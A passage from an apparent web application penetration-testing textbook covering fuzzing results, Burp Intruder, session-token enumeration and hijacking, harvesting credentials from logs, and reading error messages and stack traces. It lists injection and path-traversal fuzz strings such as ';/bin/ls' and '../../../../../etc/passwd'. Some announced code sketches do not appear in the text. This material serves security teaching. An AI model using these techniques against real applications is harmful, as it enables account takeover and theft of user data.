personalDetailsURL  ../../../../../etc/passwd  200  39417
personalDetailsURL  xsstest                    200  39198  xsstest

Starting with the _template parameter, our first request supplied a single

quotation mark, and the server responded with an HTTP 500 error code. We

might immediately suppose that the application is vulnerable to SQL injection.

However, if we look at the other results for this parameter, we can see that an

identical response was received when we supplied other payloads that are not

normally associated with SQL injection. When we supplied a path traversal
string, however, we received a different response: it has a 200 status code, is
considerably longer, and does not contain the strings error or not found.

Looking back at the original request, we can see that the

_template parameter

takes what appears to be a file path, and so a tentative diagnosis of the

observed behavior would be that the application’s handling of the parameter

is vulnerable to a path traversal bug. We should immediately reissue this test

case manually and review the server’s response in full (see Chapter 10).

The

personalDetailsURL parameter looks less exciting. Each test case

returns a 200 status code with responses that are almost the same length. How-

ever, when we supplied the string

xsstest, this string was copied into the

server’s response. The name of the parameter suggests that this is being used

to transmit a URL via the client, which will be embedded into the next page

returned by the application. This operation may be vulnerable to cross-site

scripting, and we should probe the application’s handling of more crafted

input in order to confirm this (see Chapter 12).

The login parameter is used to submit the username to the login function,

and so submitting attack strings as this parameter should at the very least gen-

erate a failed login. And indeed, we can see that three of the test cases result in

an HTTP redirect containing the string

invalid, which probably appears

within the redirection URL. The fourth test case is much more interesting. Sub-

mitting a single quotation mark as the username resulted in an HTTP 500

response containing the strings

error and illegal. This could indeed be a

SQL injection flaw, and we should manually investigate to confirm this (see

Chapter 9).
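A first pass over results like these can itself be automated. The following is a minimal sketch and is not part of JAttack: the Triage and Result names are hypothetical, and the rule used (flag any row whose status code differs from the most common status code for the same parameter) is only one plausible heuristic. The sample rows are taken from the output extract shown earlier.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Hypothetical triage helper for tab-delimited fuzzing results.
final class Triage
{
    static final class Result
    {
        final String param, payload;
        final int status, length;

        Result(String param, String payload, int status, int length)
        {
            this.param = param; this.payload = payload;
            this.status = status; this.length = length;
        }
    }

    // Returns results whose status code is less common than the most
    // frequent status code seen for the same parameter.
    static List<Result> statusOutliers(List<Result> results)
    {
        // Count how often each status code occurs per parameter.
        Map<String, Map<Integer, Integer>> counts = new HashMap<>();
        for (Result r : results)
            counts.computeIfAbsent(r.param, k -> new HashMap<>())
                  .merge(r.status, 1, Integer::sum);

        List<Result> outliers = new ArrayList<>();
        for (Result r : results)
        {
            Map<Integer, Integer> perStatus = counts.get(r.param);
            int mine = perStatus.get(r.status);
            int best = 0;
            for (int c : perStatus.values())
                best = Math.max(best, c);
            if (mine < best)
                outliers.add(r);
        }
        return outliers;
    }

    // The eight rows from the output extract.
    static List<Result> sample()
    {
        String[] payloads =
            { "'", ";/bin/ls", "../../../../../etc/passwd", "xsstest" };
        int[][] template = { {500, 498}, {500, 498}, {200, 3987}, {500, 498} };
        int[][] details = { {200, 39192}, {200, 39199}, {200, 39417}, {200, 39198} };
        List<Result> rows = new ArrayList<>();
        for (int i = 0; i < payloads.length; i++)
            rows.add(new Result("_template", payloads[i], template[i][0], template[i][1]));
        for (int i = 0; i < payloads.length; i++)
            rows.add(new Result("personalDetailsURL", payloads[i], details[i][0], details[i][1]));
        return rows;
    }

    public static void main(String[] args)
    {
        for (Result r : statusOutliers(sample()))
            System.out.println(r.param + "\t" + r.payload + "\t" + r.status);
    }
}
```

A rule of this kind picks out the path traversal case for _template but not the reflected xsstest string in personalDetailsURL, which is why the matched-string column and a manual review remain necessary.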

Putting It All Together: Burp Intruder

The JAttack tool consists of fewer than 250 lines of simple code, and yet in a few

seconds, it uncovered at least three potentially serious security vulnerabilities

while fuzzing a single request to an application.

Nevertheless, despite its power, as soon as you start to use a tool like JAttack

to deliver automated bespoke attacks, you will quickly identify additional

functionality that would make it even more helpful. As it stands, you need to

configure every targeted request within the tool’s source code and then recom-

pile it. It would be better to read this information from a configuration file and

dynamically construct the attack at runtime. In fact, it would be much better to

have a nice user interface which lets you configure each of the attacks described

in a few seconds.

There are many situations in which you will need more flexibility in the way

that payloads are generated, requiring many more advanced payload sources

than the ones we have created. You will also often need support for SSL, HTTP

authentication, and automatic encoding of unusual characters within payloads.

There are situations in which modifying a single parameter at a time will be too

restrictive — you will want to inject one payload source into one parameter,

and a different source into another. It would be good to store all of the applica-

tion’s responses for easy reference, so that you can immediately inspect an

interesting response to understand what is happening, and even tinker with the

corresponding request manually and reissue it. It would also be nice to inte-

grate the tool with other useful hack tools like a proxy and a spider, avoiding

the need to cut and paste information back and forth.

Burp Intruder is a unique tool that implements all of this functionality. It is

designed specifically to enable you to perform all kinds of bespoke automated

attacks with a minimum of configuration, and to present the results in a rich

amount of detail, enabling you to quickly home in on hits and other anom-

alous test cases. It is also fully integrated with the other Burp Suite tools — for

example, you can trap a request in the proxy, pass this to Intruder to be fuzzed,

and within seconds identify the kind of vulnerabilities described in the previ-

ous example.

We will describe the basic functions and configuration of Burp Intruder and

then look at some examples of it being used to perform bespoke automated

attacks.

Positioning Payloads

Burp Intruder uses a similar conceptual model to JAttack, based on position-

ing payloads at specific points within a request, and one or more payload

sources. However, it is not restricted to inserting payload strings into the val-

ues of the actual request parameters — payloads can be positioned at a sub-

part of a parameter’s value, or at a parameter’s name, or indeed anywhere at

all within the headers or body of a request.

Having identified a particular request to use as the basis for the attack, each

payload position is defined using a pair of markers, to indicate the start and

end of the insertion point for the payload, as shown in Figure 13-1.

Figure 13-1: Positioning payloads

When a payload is inserted at a particular position, any text between the

markers will be overwritten with the payload. When a payload is not being

inserted, the text between the markers will be submitted instead. This is nec-

essary in order to test one parameter at a time, leaving others unmodified, as

when performing application fuzzing. Clicking on the Auto button will make

Intruder set payload positions at the values of all URL, cookie, and body para-

meters, thereby automating a tedious task that was done manually in JAttack.

The sniper attack type is the one you will need most frequently, and func-

tions in the same way as JAttack’s request engine, targeting one payload posi-

tion at a time, submitting all payloads at that position, and then moving on to

the next position. There are other attack types that enable you to target multi-

ple positions simultaneously in different ways, using multiple payload sets.
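The marker model and the sniper attack type can be approximated in a few lines. This is a sketch of the behavior described above, not Intruder's implementation: the SniperTemplate class is hypothetical, and the § character (written as the escape \u00a7 in the code) is assumed as the marker because that is how Burp Intruder displays payload positions.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

// Hypothetical sketch of marker-based payload positions.
final class SniperTemplate
{
    // Marker delimiting each payload position (the section sign).
    static final String MARKER = "\u00a7";

    // For each position in turn, and for each payload, builds one request
    // in which that position holds the payload and every other position
    // keeps the original text found between its markers.
    static List<String> build(String template, List<String> payloads)
    {
        // With n marker pairs there are 2n + 1 parts; the parts at odd
        // indexes are the original values inside the markers.
        String[] parts = template.split(MARKER, -1);
        if (parts.length % 2 == 0)
            throw new IllegalArgumentException("unbalanced markers");
        int positions = parts.length / 2;

        List<String> requests = new ArrayList<>();
        for (int target = 0; target < positions; target++)
            for (String payload : payloads)
            {
                StringBuilder sb = new StringBuilder();
                for (int i = 0; i < parts.length; i++)
                {
                    boolean insidePosition = (i % 2 == 1);
                    boolean isTarget = insidePosition && (i / 2 == target);
                    sb.append(isTarget ? payload : parts[i]);
                }
                requests.add(sb.toString());
            }
        return requests;
    }

    public static void main(String[] args)
    {
        String template =
            "action=" + MARKER + "view" + MARKER
            + "&logid=" + MARKER + "29810" + MARKER;
        for (String request : build(template, Arrays.asList("'", "xsstest")))
            System.out.println(request);
    }
}
```

With two positions and two payloads this yields four request bodies, each differing from the base request in exactly one place.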

Choosing Payloads

The next step in preparing an attack is to choose the set of payloads to be

inserted at the defined positions. Intruder contains numerous built-in func-

tions for generating attack payloads, including the following:

■■

Lists of preset and configurable items.

■■

Custom iteration of payloads based on any syntactic scheme. For exam-

ple, if the application uses usernames of the form ABC45D, then the

custom iterator can be used to cycle through the range of all possible

usernames.

■■

Character and case substitution. From a starting list of payloads,

Intruder can modify individual characters and their case to generate

variations. This can be useful when brute forcing passwords: for exam-

ple, the string

password can be modified to become p4ssword, passw0rd,

Password, PASSWORD, and so on.

■■

Numbers, which can be used to cycle through document IDs, session

tokens, and so on. Numbers can be created in decimal or hexadecimal,

as integers or fractions, sequentially, in stepped increments, or ran-

domly. Producing random numbers within a defined range can be use-

ful in searching for hits when you have an idea of how large some valid

values are but have not identified any reliable pattern for extrapolating

these.

■■

Dates, which can be used in the same way as numbers in some situa-

tions. For example, if a login form requires entry of date of birth, this

function can be used to brute force all of the valid dates within a speci-

fied range.

■■

Illegal Unicode-encodings, which can be used to bypass some input fil-

ters by submitting alternative encodings of malicious characters.

■■

Character blocks, which can be used to probe for buffer overflow vul-

nerabilities (see Chapter 15).

■■

A brute-forcer function, which can be used to generate all the permutations
of a particular character set in a specific range of lengths. Using this
function is a last resort in most situations because of the huge number of
requests that it generates. For example, brute forcing all possible
six-character passwords containing only lowercase alphabetical characters
produces more than 300 million permutations (26^6 = 308,915,776), which is
more than can practically be tested with only remote access to the application.
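The size of a brute-force payload set is easy to compute before committing to an attack. The sketch below uses a hypothetical Keyspace class to sum the number of strings over an alphabet for a range of lengths. For six lowercase letters it gives 26^6 = 308,915,776 candidates.

```java
import java.math.BigInteger;

// Hypothetical helper for estimating the size of a brute-force attack.
final class Keyspace
{
    // Number of strings over an alphabet of the given size whose length
    // lies between minLen and maxLen inclusive.
    static BigInteger count(int alphabetSize, int minLen, int maxLen)
    {
        BigInteger total = BigInteger.ZERO;
        BigInteger base = BigInteger.valueOf(alphabetSize);
        for (int len = minLen; len <= maxLen; len++)
            total = total.add(base.pow(len));
        return total;
    }

    public static void main(String[] args)
    {
        // Six characters drawn from a-z.
        System.out.println(count(26, 6, 6));
    }
}
```

At an assumed rate of 100 requests per second, which is purely illustrative, working through that many candidates would take roughly five weeks.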

Burp Intruder will by default URL-encode any characters that might invali-

date your request if placed into the request in their literal form.
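To see what such encoding does to the fuzz strings used earlier, the standard library's URLEncoder can serve as a stand-in. This is an approximation only: URLEncoder applies HTML form encoding (a space becomes +, for example) and may encode more or fewer characters than Intruder does. The PayloadEncoding class is hypothetical, and the Charset overload used here requires Java 10 or later.

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

// Hypothetical helper showing form-style URL encoding of payloads.
final class PayloadEncoding
{
    // Encodes characters that would otherwise alter the structure of a
    // query string or form body, such as &, =, / and ;.
    static String encode(String payload)
    {
        return URLEncoder.encode(payload, StandardCharsets.UTF_8);
    }

    public static void main(String[] args)
    {
        String[] payloads =
        {
            "'", ";/bin/ls", "../../../../../etc/passwd", "xsstest"
        };
        for (String payload : payloads)
            System.out.println(payload + "\t" + encode(payload));
    }
}
```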

Configuring Response Analysis

Before launching any attack, you should identify the attributes of the server’s

responses that you are interested in analyzing. For example, when enumerat-

ing identifiers, you may need to search each response for a specific string.

When fuzzing, you may wish to scan for a large number of common error mes-

sages and the like.

By default, Burp Intruder records in its table of results the HTTP status code,

the response length, any cookies set by the server, and the time taken to receive

the response. As with JAttack, you can additionally configure Burp Intruder to

perform some custom analysis of the application’s responses to help identify

interesting cases that may indicate the presence of a vulnerability or merit
further investigation. You can specify strings or regular expressions to search
for in responses. You can set customized strings to control extraction of

data from the server’s responses. And you can make Intruder check whether

each response contains the attack payload itself, to help identify cross-site

scripting and other response injection vulnerabilities.

Having configured payload positions, payload sources, and any required

analysis of server responses, you are ready to launch your attack. Let’s take a

quick look at how Intruder can be used to deliver some common bespoke

automated attacks.

Attack 1: Enumerating Identifiers

Suppose that you are targeting an application that supports self-registration

for anonymous users. You create an account and log in, and gain access to a

minimum of functionality. At this stage, one area of obvious interest is the

application’s session tokens. Logging in several times in close succession gen-

erates the following sequence:

000000-fb2200-16cb12-172ba72551

000000-bc7192-16cb12-172ba7279e

000000-73091f-16cb12-172ba729e8

000000-918cb1-16cb12-172ba72a2a

000000-aa820f-16cb12-172ba72b58

000000-bc8710-16cb12-172ba72e2b

You follow the steps described in Chapter 7 to analyze these tokens. It is evi-

dent that approximately half of the token is not changing, but you also dis-

cover that the second portion of the token is not actually processed by the

application either. Modifying this portion entirely does not invalidate your

tokens. Furthermore, although it is not trivially sequential, the final portion

clearly appears to be incrementing in some fashion. This looks like a very

promising opportunity for a session hijacking attack.

To leverage automation to deliver this attack, you need to find a single

request/response pair that can be used to detect valid tokens. Typically, any

request for an authenticated page of the application will serve this purpose.

You decide to target the main home page presented to each user following login:

GET /home.jsp HTTP/1.1

Host: wahh-app.com

Cookie: SessionID=000000-fb2200-16cb12-172ba72551

Because of what you know about the structure and handling of session

tokens, your attack only needs to modify the final portion of the token. In fact,

because of the sequence identified, the most productive initial attack will mod-

ify only the last few digits of the token. Accordingly, you configure Intruder

with a single payload position, as shown in Figure 13-2.

Figure 13-2: Setting a custom payload position

Your payloads need to sequence through all possible values for the final

three digits. The token appears to use the same character set as hexadecimal

numbers: 0–9 and a–f. So you configure a payload source to generate all hexa-

decimal numbers in the range 0x000–0xfff, as shown in Figure 13-3.

Figure 13-3: Configuring numeric payloads
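The same payload set is simple to reproduce in code. As a minimal sketch, assuming the observed token from the request above, the hypothetical TokenCandidates class below replaces the final three characters with every value from 000 to fff, giving 4,096 candidate tokens.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical generator for candidate session tokens.
final class TokenCandidates
{
    // Replaces the last three characters of the observed token with
    // every three-digit lowercase hexadecimal value from 000 to fff.
    static List<String> generate(String observedToken)
    {
        String prefix =
            observedToken.substring(0, observedToken.length() - 3);
        List<String> tokens = new ArrayList<>(0x1000);
        for (int i = 0x000; i <= 0xfff; i++)
            tokens.add(prefix + String.format("%03x", i));
        return tokens;
    }

    public static void main(String[] args)
    {
        List<String> tokens = generate("000000-fb2200-16cb12-172ba72551");
        System.out.println(tokens.size() + " candidates");
        System.out.println(tokens.get(0));
        System.out.println(tokens.get(tokens.size() - 1));
    }
}
```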

In attacks to enumerate valid session tokens, identifying hits is typically

straightforward, and in the present case you have determined that the appli-

cation returns an HTTP 200 response when a valid token is supplied, and an

HTTP 302 redirect back to the login page when an invalid token is supplied.

Hence, you don’t need to configure any custom response analysis for this

attack.

Launching the attack causes Intruder to quickly iterate through the requests.

The attack results are displayed in the form of a table. You can click on each

column heading to sort the results according to the contents of that column.

Sorting by status code enables you to easily identify the valid tokens that you

have discovered, as shown in Figure 13-4.

Figure 13-4: Sorting attack results to quickly identify hits

The attack is successful. You can take any of the payloads that caused HTTP

200 responses, replace the last three digits of your session token with this, and

thereby hijack the sessions of other application users. However, take a closer

look at the table of results. Most of the HTTP 200 responses have roughly the

same response length, because the home page presented to different users is

more or less the same. However, two of the responses are much longer, indi-

cating that a different home page was returned.

You can double-click on a result item in Intruder to display the server’s

response in full, either as raw HTTP or rendered as HTML. Doing this reveals

that the longer home pages contain a much larger set of menu options than

your home page does. It appears that these two hijacked sessions belong to

more-privileged users.

TIP The response length very frequently proves to be a strong indicator of

anomalous responses that merit further investigation. As in the above case, a

different length of response can point towards interesting differences that you

may not have been anticipating when you devised the attack. Therefore, even if

another attribute provides a reliable indicator of hits, such as the HTTP status

code, you should always inspect the response length column to identify other

responses that are interesting.
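When a result set is too large to scan by eye, a simple length check can shortlist candidates. The sketch below is one possible heuristic and not a feature of any tool described here: the LengthOutliers class is hypothetical, it flags responses whose length differs from the median by more than a chosen fraction, and the lengths in the example are invented for illustration.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

// Hypothetical helper that shortlists responses of unusual length.
final class LengthOutliers
{
    // Returns the indexes of responses whose length differs from the
    // median length by more than the given fraction (0.2 means 20%).
    // For an even number of responses the upper middle value is used.
    static List<Integer> find(int[] lengths, double tolerance)
    {
        List<Integer> outliers = new ArrayList<>();
        if (lengths.length == 0)
            return outliers;

        int[] sorted = lengths.clone();
        Arrays.sort(sorted);
        double median = sorted[sorted.length / 2];

        for (int i = 0; i < lengths.length; i++)
            if (Math.abs(lengths[i] - median) > tolerance * median)
                outliers.add(i);
        return outliers;
    }

    public static void main(String[] args)
    {
        // Invented response lengths: most home pages are similar in
        // size, and two are much longer.
        int[] lengths = { 5120, 5133, 9870, 5127, 5119, 10412 };
        System.out.println(find(lengths, 0.2));
    }
}
```

The threshold is a judgment call. A tight tolerance produces more false positives, and a loose one may hide a response that differs by only a few hundred bytes.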

Attack 2: Harvesting Information

You use your intercepting proxy to set one of the more privileged session

tokens in your browser and so begin using the application interactively as the

compromised user. Among the additional functionality to which you

now have access is a logging function, which contains log entries for all kinds

of actions performed by other users of the application. Logs of this kind often

provide a gold mine of useful information that can assist you in furthering

your attack. Reading through a few entries, you discover that the application

is logging detailed debugging information whenever an error occurs. This

includes the username of the relevant user, the user’s session token, and the

full parameters of the request. Such information is useful to application devel-

opers when investigating and resolving errors within the application, and it is

equally useful to an attacker. You can quickly grab a list of valid usernames

and session tokens, and you can also capture the data entered by many other

application users. If an error occurred when a user supplied some sensitive

information, such as a password or credit card details, then you will be able to

harvest all of this information by trawling through the logs.

Log file entries are accessed using the following request, where the

logid

parameter is a sequential number:

POST /secure/logs.jsp HTTP/1.1
Host: wahh-app.com
Cookie: SessionID=000000-fb2200-16cb12-172ba72044
Content-Length: 83

action=view&resource=eventLogs&DB=wahh.audit&returnURL=/secure/logs.jsp&logid=29810

To configure Intruder to iterate through log file entries, you will need to use

a numeric payload source to generate integers within the range of identifiers

in use, and you will need to set a single payload position, targeting the

logid

parameter, as shown in Figure 13-5.

Figure 13-5: Positioning the payload

When a log file entry contains a listing of user-supplied parameters, the rel-

evant part of the HTML source looks like this:

<div style="param">action=search</div>
<div style="param">source=homeware</div>
<div style="param">sort=price</div>
<div style="param">start=20</div>
<div style="param">q=toaster</div>

You can configure Intruder to capture all of this information in a usable form

with the Extract Grep function. This works in a similar way to the extract func-

tion of JAttack — you specify the expression which precedes the item you

want to extract. However, in the present case, there are a variable number of

items you want to extract, each preceded by the same expression. To handle

this scenario, you simply need to enter this expression multiple times, and

Intruder will search through the response for each occurrence, capturing

whatever comes next, until no more occurrences are found, as shown in

Figure 13-6.
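The extraction logic can be sketched as follows. This approximates the behavior just described and is not Intruder's implementation: the ExtractGrep class and its extractAll method are hypothetical, and the choice to stop each captured item at the next < character is an assumption that suits the HTML shown above.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical sketch of repeated prefix-based extraction.
final class ExtractGrep
{
    // Finds every occurrence of prefix in the response and captures the
    // text that follows it, up to (but not including) the delimiter.
    static List<String> extractAll(String response, String prefix,
                                   String delimiter)
    {
        if (prefix.isEmpty())
            throw new IllegalArgumentException("prefix must not be empty");

        List<String> items = new ArrayList<>();
        int from = 0;
        while (true)
        {
            int start = response.indexOf(prefix, from);
            if (start == -1)
                break;                      // no more occurrences
            start += prefix.length();
            int end = response.indexOf(delimiter, start);
            if (end == -1)
                end = response.length();    // capture to end of response
            items.add(response.substring(start, end));
            from = end;
        }
        return items;
    }

    public static void main(String[] args)
    {
        String html =
            "<div style=\"param\">action=search</div>\n"
            + "<div style=\"param\">source=homeware</div>\n"
            + "<div style=\"param\">sort=price</div>\n"
            + "<div style=\"param\">start=20</div>\n"
            + "<div style=\"param\">q=toaster</div>\n";
        for (String item : extractAll(html, "<div style=\"param\">", "<"))
            System.out.println(item);
    }
}
```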

Launching this attack quickly iterates through all of the log file entries in the

range specified. Many of the entries contain debugging information and show

the details of the data submitted by the user. As before, you can sort the results

by the first extracted data column, to quickly review this for interesting items,

as shown in Figure 13-7.

Figure 13-6: Configuring Extract Grep

Figure 13-7: Data harvested from log file entries

Even the first few results from the attack appear to contain plenty of useful

data, including usernames, passwords, and payment information. Continuing

to mine data from the logs could soon enable you to compromise an adminis-

trative account and own the entire application.

Attack 3: Application Fuzzing

In addition to exploiting the log functionality to extract useful information,

you should also, of course, probe it for common vulnerabilities. Functionality

that can be reached only by privileged users is often subject to less stringent

security testing, because it is assumed that only trusted users will access it. If

you can somehow gain access to the functionality, you may be able to exploit

any defect in it to escalate privileges even further — potentially compromising

the entire database or web server.

To perform a quick fuzz test of the previous request, you need to set payload

positions at all of the request parameters, not only the

logid parameter. You

can do this simply by clicking the Auto button on the positions tab. You then

need to configure a set of attack strings to use as payloads and some common

error messages to search responses for. Intruder contains built-in sets of strings

for both of these uses.

As with the fuzzing attack performed using JAttack, you then need to man-

ually review the table of results to identify any anomalies that merit further

investigation, as shown in Figure 13-8. As before, you can click on column

headings to sort the responses in various ways, to help identify interesting

cases.

Figure 13-8: Results from fuzzing a single request

From an initial look at the results, it strongly appears that the application is

vulnerable to SQL injection. In payload positions 2 and 3, when a single quo-

tation mark is submitted, the application returns an HTTP 500 status code and

a message containing the string

ODBC. This behavior definitely warrants some

manual investigation to confirm and exploit the bug.

TIP You can right-click on any interesting-looking result and send the
corresponding request to the Burp Repeater tool. This enables you to modify the request

manually and reissue it multiple times, to test the application’s handling of

different payloads, probe for filter bypasses, or deliver actual exploits.

Chapter Summary

When you are attacking a web application, the majority of the necessary tasks

need to be tailored to that application’s behavior and the methods by which it

enables you to interact with and manipulate it. Because of this, you will often

find yourself working manually, submitting individually crafted requests, and

reviewing the application’s responses to these.

The techniques we described in this chapter are conceptually intuitive. They

involve leveraging automation to make these bespoke tasks easier, faster, and

more effective. It is possible to automate virtually any manual procedure that

you wish to carry out — using the power and reliability of your own computer

to attack the defects and weak points of your target.

Although conceptually straightforward, using bespoke automation in an

effective way requires experience, skill, and imagination. There are tools that

will help you, or you can write your own. But there is no substitute for the

intelligent human input that distinguishes a truly accomplished web applica-

tion hacker from a mere amateur. When you have mastered all of the tech-

niques described in the other chapters of this book, you should return to this

topic, and practice the different ways in which bespoke automation can be

used in the application of those techniques.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. Identify three indicators of hits when using automation to enumerate

identifiers within an application.

2. For each of the following categories, identify one fuzz string that can

often be used to identify it:

(a) SQL injection

(b) OS command injection

(d) Script file inclusion

3. When you are fuzzing a request that contains a number of different

parameters, why is it important to perform requests targeting

each parameter in turn and leaving the others unmodified?

4. You are formulating an automated attack to brute force a login function

to discover additional account credentials. You find that the application

returns an HTTP redirection to the same URL regardless of whether you

submit valid or invalid credentials. In this situation, what is the most

likely means you can use to detect hits?

5. When you are using an automated attack to harvest data from within

the application, you will often find that the information you are inter-

ested in is preceded by a static string that enables you to easily capture

the data following it. For example:

<input type="text" name="LastName" value="

On other occasions, you may find that this is not the case, and that the

data preceding the information you need is more variable. In this situa-

tion, how can you devise an automated attack that still fulfills your

needs?

CHAPTER 14

Exploiting Information Disclosure

In Chapter 4, we described various techniques you can use to map a target
application and gain an initial understanding of how it works. That methodology
involved interacting with the application in largely benign ways, to catalog
its content and functionality, determine the technologies in use, and
identify the key attack surface.

In this chapter, we describe ways in which you can extract further information
from an application during an actual attack. This mainly involves interacting
with the application in unexpected and malicious ways, and exploiting
anomalies in the application’s behavior in order to extract information that is of
value to you. If successful, such an attack may enable you to retrieve sensitive
data such as user credentials, gain a deeper understanding of an error condition
in order to fine-tune your attack, discover more detail about the technologies in
use, and map the application’s internal structure and functionality.

Exploiting Error Messages

Many web applications return informative error messages when unexpected
events occur. These may range from simple built-in messages that disclose
only the category of the error, to full-blown debugging information that gives
away a lot of detail about the application’s state.

Most applications are subject to various kinds of usability testing prior to deployment, and this testing will typically identify most error conditions that may arise when the application is being used in the normal way. These conditions are therefore normally handled in a graceful manner that does not involve any technical messages being returned to the user. However, when an application is under active attack, it is likely that a much wider range of error conditions will arise, which may result in more detailed information being returned to the user. Even the most security-critical applications, such as those used by online banks, have been found to return highly verbose debugging output when a sufficiently unusual error condition is generated.

Script Error Messages

When an error arises in an interpreted web scripting language, such as

VBScript, the application typically returns a simple message disclosing the

nature of the error, and possibly the line number of the file where the error

occurred. For example:

Microsoft VBScript runtime error 800a0009

Subscript out of range: [number -1]

/register.asp, line 821

This kind of message does not typically contain any sensitive information about the state of the application or the data being processed. However, it may assist you in various ways in narrowing down the focus of your attack. For example, when you are inserting different attack strings into a specific parameter to probe for common vulnerabilities, you may encounter the following message:

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "'"]'

/scripts/confirmOrder.asp, line 715

This message indicates that the value that you have modified is probably being assigned to a numeric variable, and you have supplied input that cannot be so assigned because it contains non-numeric characters. In this situation, it is highly likely that nothing is to be gained by submitting non-numeric attack strings in this parameter, and so for many categories of bugs, you will be better off targeting other parameters.

A different way in which this type of error message may assist you is in

gaining a better understanding of the logic that is implemented within

the server-side application. Because the message discloses the line number

where the error occurred, you may be able to confirm whether two different


malformed requests are triggering the same error or different errors. You may also be able to determine the sequence in which different parameters are processed, by submitting bad input within multiple parameters and identifying the location at which an error occurs. By systematically manipulating different parameters, you may be able to map out the different code paths being executed on the server.
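
As a rough illustration of this technique, the following Python sketch parses script error messages in the format shown earlier and groups requests by the file and line number they report. It is a minimal sketch rather than a definitive tool: the function names and request labels are hypothetical, and it assumes you have already reduced each response to plain text with any HTML markup removed.

```python
import re
from collections import defaultdict

# Matches the three-line classic ASP error format shown earlier.
# Assumption: the error code may or may not be wrapped in single quotes.
ERROR_RE = re.compile(
    r"Microsoft VBScript runtime error\s+'?(?P<code>[0-9a-fA-F]{8})'?\s*"
    r"(?P<description>[^\r\n]+?)\s*[\r\n]+\s*"
    r"(?P<path>/\S+), line (?P<line>\d+)"
)


def parse_script_error(body):
    """Return the error code, description, script path, and line number,
    or None if the text contains no recognizable script error."""
    match = ERROR_RE.search(body)
    if match is None:
        return None
    return {
        "code": match.group("code").lower(),
        "description": match.group("description"),
        "path": match.group("path"),
        "line": int(match.group("line")),
    }


def group_by_location(responses):
    """Map (path, line) to the labels of the requests that hit that location.

    `responses` is a dict of request label -> response text.
    """
    groups = defaultdict(list)
    for label, body in responses.items():
        error = parse_script_error(body)
        if error is not None:
            groups[(error["path"], error["line"])].append(label)
    return dict(groups)
```

Requests that land in the same group are probably triggering the same error, whereas requests that land in different groups are likely exercising different statements or code paths. Treat the grouping as a hint to investigate further, not as proof.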

TIP Even if an error message does not disclose any interesting information, it

may represent an exploitable vulnerability. For example, it is common to find

XSS bugs in error messages which contain the anomalous user-supplied input

that generated the error (see Chapter 12).

Stack Traces

Most web applications are written in languages that are more complex than

simple scripts but which still run in a managed execution environment — for

example, Java, C#, and Visual Basic .NET. When an unhandled error occurs in

these languages, it is common to see full stack traces being returned to the

browser.

A stack trace is a structured error message that begins with a description of

the actual error. This is followed by a series of lines describing the state of the

execution call stack when the error occurred. The top line of the call stack

shows the function that generated the error, the next line shows the function

that invoked the previous function, and so on down the call stack until the

hierarchy of function calls is exhausted.

The following is an example of a stack trace generated by an ASP.NET

application:

[HttpException (0x80004005): Cannot use a leading .. to exit above the

top directory.]

System.Web.Util.UrlPath.Reduce(String path) +701

System.Web.Util.UrlPath.Combine(String basepath, String relative) +304

System.Web.UI.Control.ResolveUrl(String relativeUrl) +143

PBSApp.StatFunc.Web.MemberAwarePage.Redirect(String url) +130

PBSApp.StatFunc.Web.MemberAwarePage.Process() +201

PBSApp.StatFunc.Web.MemberAwarePage.OnLoad(EventArgs e)

System.Web.UI.Control.LoadRecursive() +35

System.Web.UI.Page.ProcessRequestMain() +750

Version Information: Microsoft .NET Framework Version:1.1.4322.2300;

ASP.NET Version:1.1.4322.2300


This kind of error message provides a large amount of useful information

that may assist you in fine-tuning your attack against the application:

■ It often describes the precise reason why an error occurred. This may enable you to adjust your input to circumvent the error condition and advance your attack.

■ The call stack typically makes reference to a number of library and third-party code components that are being used within the application. You can review the documentation for these components to understand their intended behavior and assumptions. You can also create your own local implementation and test this to understand the ways in which it handles unexpected input and potentially identify vulnerabilities.

■ The call stack includes the names of the proprietary code components being used to process the request. The naming scheme for these and the interrelationships between them may allow you to infer details about the internal structure and functionality of the application.

■ The stack trace often includes line numbers. As with the simple script error messages described previously, these may enable you to probe and understand the internal logic of individual application components.

■ The error message often includes additional information about the application and the environment in which it is running. In the preceding example, you can determine the exact version of the ASP.NET platform being used. This enables you to investigate the platform for known or new vulnerabilities, anomalous behavior, common configuration errors, and so on.
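
To illustrate how some of these points might be applied in practice, here is a minimal Python sketch that separates the frames of an ASP.NET-style stack trace into platform components and application-specific components, and extracts any version banner. The function name and the PLATFORM_PREFIXES list are assumptions made for illustration. Real traces vary in format, so expect to adjust the patterns for the target.

```python
import re

# One call-stack frame, e.g. "System.Web.UI.Page.ProcessRequestMain() +750".
FRAME_RE = re.compile(
    r"^\s*(?P<method>[A-Za-z_][\w.]*)\((?P<args>[^)]*)\)(?:\s*\+(?P<offset>\d+))?\s*$"
)

# Version banner entries such as "ASP.NET Version:1.1.4322.2300".
VERSION_RE = re.compile(
    r"(?P<name>Microsoft \.NET Framework|ASP\.NET) Version:\s*(?P<version>\d+(?:\.\d+)*)"
)

# Assumption: namespaces with these prefixes belong to the platform itself.
PLATFORM_PREFIXES = ("System.", "Microsoft.")


def summarize_stack_trace(text):
    """Split stack frames into platform and application code, and
    collect any version numbers disclosed alongside the trace."""
    frames = []
    for line in text.splitlines():
        match = FRAME_RE.match(line)
        if match:
            frames.append(match.group("method"))
    return {
        "platform": [f for f in frames if f.startswith(PLATFORM_PREFIXES)],
        "custom": [f for f in frames if not f.startswith(PLATFORM_PREFIXES)],
        "versions": {m.group("name"): m.group("version")
                     for m in VERSION_RE.finditer(text)},
    }
```

Run against the trace shown earlier, the "custom" list would hold the three PBSApp.StatFunc.Web.MemberAwarePage methods, which are the names most likely to reveal something about the application's internal structure.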

Informative Debug Messages

Some applications generate custom error messages that contain a large

amount of debug information. These are normally implemented to facilitate

debugging during development and testing, and often contain rich detail

about the runtime state of the application. For example:

-------------------------------------------

* * * S E S S I O N * * *

-------------------------------------------

i5agor2n2pw3gp551pszsb55

SessionUser.Sessions App.FEStructure.Sessions

SessionUser.Auth 1

SessionUser.BranchID 103

SessionUser.CompanyID 76

SessionUser.BrokerRef RRadv0

SessionUser.UserID 229


SessionUser.Training 0

SessionUser.NetworkID 11

SessionUser.BrandingPath FE

LoginURL /Default/fedefault.aspx

